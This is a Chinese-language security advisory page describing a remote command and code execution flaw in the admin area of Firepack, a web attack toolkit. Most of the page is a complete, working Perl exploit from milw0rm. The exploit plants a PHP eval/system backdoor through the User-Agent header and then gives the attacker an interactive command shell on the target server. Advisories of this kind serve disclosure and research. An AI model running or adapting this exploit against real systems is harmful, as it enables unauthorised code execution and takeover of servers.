发布日期：2009-02-18
更新日期：2009-02-18

受影响系统：

Firepack Firepack

描述：

---

Firepack的管理区域在实现上存在安全漏洞，如果没有使用.htaccess保护，可使攻击者执行恶意程序。

<*来源：Lidloses_Auge
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl
#
# Firepack - Remote Command\Code Execution Exploit
#
# Firepack is a web atting toolkit often used in 2008, when the most
# versions of it were published. A short time ago i looked though the
# sourcecode and noticed that Vulnerability which can be used
# if the admin doesn't use a .htaccess protection in his admin area.
# WARNING: When accessing the index.php, malware could be executed
# so i recommend to execute it in a virtual environment.
# Username and password are located in config.php in the main folder

print("
################################################

Firepack - Remote Command/Code Execution Exploit

Date:                        17.02.2009
Vulnerability discovered by: Lidloses_Auge
Exploit coded by:            Lidloses_Auge
Greetz to:                   -=Player=- , Suicide,
                             g4ms3, enco, Palme, GPM,
                             karamble, Free-Hack

################################################

Use:

1) Your enemy

    URL (e.g. http://localhost/FirePack/)
    
2) Weapons

    1 = Remote Command Execution (OS Commands)
    2 = Remote Code Execution (PHP Commands)

################################################

Select the enemy now:

\t");
$enemy = <STDIN>;
$enemy = substr($enemy,0,length($enemy)-1);
print "\nChoose your weapon!\n\n\t";
$choice = <STDIN>;
$choice = substr($choice,0,length($choice)-1);

if ($choice == 1 | $choice == 2) {
    print "\n>>> Entering the ship!";
    use LWP::Simple;
    use LWP::UserAgent;
    my $ua = LWP::UserAgent->new;
    $param[0] = "cmd";
    $param[1] = "code";
    $param[2] = "system";
    $param[3] = "eval";
    $code = "<?php if(isset(\$_GET['$param[$choice-1]'])){echo 'fp_$param[$choice-1]1';$param[$choice+1](\$_GET['$param[$choice-1]']);echo 'fp_$param[$choice-1]2';die;} ?>";
    $ua->agent($code);
    $req = HTTP::Request->new(GET => $enemy."index.php");
    $req->header('Accept' => 'text/html');
    $res = $ua->request($req);
    if (!($res->is_success)) {
        print "\nFailed! Wrong enemy dude?\n";
    } else {
        print "\nWelcome aboard, warrior! Try some commands ('quit' to exit):";
        $splitlen = length("fp_".$param[$choice-1])+1;
        $key = "fp_".$param[$choice-1];
        while (substr($cmd,0,length($cmd)-1) ne "quit") {
            print "\n\n>Do: ";
            $cmd = <STDIN>;
            if (substr($cmd,0,length($cmd)-1) ne "quit") {
                $src = get($enemy."admin/ref.php?$param[$choice-1]=$cmd");
                print "\n".substr($src,index($src,$key."1")+$splitlen,index($src,$key."2")-index($src,$key."1")-$splitlen);
            }
        }
    }
} else {
    print "\nWanna fight without weapon? No way dude!";
}

# milw0rm.com [2009-02-18]

建议：

---

厂商补丁：

Firepack
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

浏览次数：3126
严重程度：0（网友投票）